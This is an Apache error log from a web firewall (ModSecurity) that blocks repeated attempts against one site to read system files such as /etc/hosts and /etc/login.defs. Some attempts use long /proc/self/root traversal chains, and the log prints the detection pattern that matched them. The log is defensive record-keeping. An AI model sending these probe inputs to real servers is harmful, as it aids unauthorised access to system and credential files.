[Fri Mar 20 11:57:49.643514 2026] [:error] [pid 7235:tid 140411582465792] [client 57.141.18.0:52420] [client 57.141.18.0] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/login.defs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1gbfqxLDW4GITHUkQeGgAAARM"]
[Fri Mar 20 11:57:58.880288 2026] [:error] [pid 7893:tid 140411658000128] [client 57.141.18.40:52952] [client 57.141.18.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/magic"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1gdhCii7xarUs8iHaePAAAAgo"]
[Fri Mar 20 11:58:01.383230 2026] [:error] [pid 21219:tid 140411632822016] [client 74.7.241.31:56216] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1gefXLqtnMIWvjpaLQOAAAAo0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc
[Fri Mar 20 11:58:05.082209 2026] [mime_magic:error] [pid 26799:tid 140411683178240] (70014)End of file found: [client 57.141.18.92:53330] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:58:14.878714 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:41628] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1ghda6ubjKNq_cu4YP3QAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 11:58:16.258174 2026] [mime_magic:error] [pid 7235:tid 140411691570944] (70014)End of file found: [client 57.141.18.67:53980] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:58:16.258252 2026] [mime_magic:error] [pid 11642:tid 140411590858496] (70014)End of file found: [client 216.73.216.191:53978] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:58:28.663990 2026] [:error] [pid 10189:tid 140411699963648] [client 57.141.18.120:54580] [client 57.141.18.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mailcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1glDJ3M9BSuKP7CAZciQAAAIU"]
[Fri Mar 20 11:58:31.332567 2026] [mime_magic:error] [pid 11167:tid 140411548894976] (70014)End of file found: [client 57.141.18.6:54774] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:58:32.971044 2026] [:error] [pid 9818:tid 140411641214720] [client 74.7.243.128:52614] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1gmF1pVZ5mVmJwsFNhqgAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 11:58:40.209942 2026] [mime_magic:error] [pid 11642:tid 140411574073088] (70014)End of file found: [client 57.141.18.111:55348] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:58:48.087086 2026] [:error] [pid 7235:tid 140411574073088] [client 74.7.243.128:33342] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1gpvqxLDW4GITHUkQeYQAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 11:58:48.118640 2026] [:error] [pid 11642:tid 140411741927168] [client 57.141.18.54:55728] [client 57.141.18.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1gqLninkcc-iUj5AqP9QAAA4A"]
[Fri Mar 20 11:59:09.046952 2026] [:error] [pid 26799:tid 140411599251200] [client 57.141.18.32:56646] [client 57.141.18.32] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mailcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1gvda6ubjKNq_cu4YQFwAAA1E"]
[Fri Mar 20 11:59:39.552560 2026] [:error] [pid 7235:tid 140411582465792] [client 57.141.18.104:58566] [client 57.141.18.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1g2_qxLDW4GITHUkQekQAAARM"]
[Fri Mar 20 12:00:41.778737 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.241.31:32824] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1hGda6ubjKNq_cu4YQhQAAA00"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/initramfs/state/etc
[Fri Mar 20 12:00:49.409780 2026] [mime_magic:error] [pid 15826:tid 140411599251200] (70014)End of file found: [client 216.73.216.191:34214] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:00:51.525767 2026] [mime_magic:error] [pid 26799:tid 140411641214720] (70014)End of file found: [client 216.73.216.191:34354] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:01:14.991751 2026] [:error] [pid 11642:tid 140411725141760] [client 57.141.18.44:35866] [client 57.141.18.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1hOrninkcc-iUj5AqQqQAAA4I"]
[Fri Mar 20 12:01:15.327848 2026] [:error] [pid 10189:tid 140411666392832] [client 57.141.18.87:35880] [client 57.141.18.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1hOzJ3M9BSuKP7CAZdOgAAAIk"]
[Fri Mar 20 12:01:22.159021 2026] [:error] [pid 21219:tid 140411607643904] [client 57.141.18.71:36258] [client 57.141.18.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1hQvXLqtnMIWvjpaLRKgAAApA"]
[Fri Mar 20 12:01:36.255836 2026] [:error] [pid 9818:tid 140411574073088] [client 216.73.216.191:37098] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/gmt-8"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1hUF1pVZ5mVmJwsFNiawAAAFQ"]
[Fri Mar 20 12:01:38.046134 2026] [:error] [pid 21219:tid 140411683178240] [client 216.73.216.191:37222] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/gmt 2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1hUvXLqtnMIWvjpaLROgAAAoc"]
[Fri Mar 20 12:01:38.788898 2026] [mime_magic:error] [pid 9818:tid 140411733534464] (70014)End of file found: [client 216.73.216.191:37272] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:01:40.002791 2026] [:error] [pid 7893:tid 140411658000128] [client 216.73.216.191:37360] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/gmt-5"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1hVBCii7xarUs8iHafiwAAAgo"]
[Fri Mar 20 12:01:41.097227 2026] [:error] [pid 10189:tid 140411658000128] [client 216.73.216.191:37426] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/gmt-4"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1hVTJ3M9BSuKP7CAZdXQAAAIo"]
[Fri Mar 20 12:01:44.057480 2026] [:error] [pid 7893:tid 140411649607424] [client 216.73.216.191:37616] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/gmt-7"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1hWBCii7xarUs8iHaflgAAAgs"]
[Fri Mar 20 12:01:48.759228 2026] [:error] [pid 7235:tid 140411725141760] [client 216.73.216.191:37888] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/gmt-3"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1hXPqxLDW4GITHUkQfBwAAAQI"]
[Fri Mar 20 12:01:51.714509 2026] [:error] [pid 26799:tid 140411641214720] [client 216.73.216.191:38010] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/gmt-9"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1hX9a6ubjKNq_cu4YQ7gAAA0w"]
[Fri Mar 20 12:02:09.344941 2026] [:error] [pid 7235:tid 140411708356352] [client 57.141.18.67:38748] [client 57.141.18.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1hcfqxLDW4GITHUkQfGQAAAQQ"]
[Fri Mar 20 12:02:10.005341 2026] [:error] [pid 10189:tid 140411582465792] [client 57.141.18.99:38820] [client 57.141.18.99] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1hcjJ3M9BSuKP7CAZdfQAAAJM"]
[Fri Mar 20 12:02:10.377340 2026] [:error] [pid 7235:tid 140411616036608] [client 57.141.18.29:38832] [client 57.141.18.29] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1hcvqxLDW4GITHUkQfGgAAAQ8"]
[Fri Mar 20 12:02:14.392954 2026] [:error] [pid 10189:tid 140411557287680] [client 57.141.18.50:38894] [client 57.141.18.50] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1hdjJ3M9BSuKP7CAZdggAAAJY"]
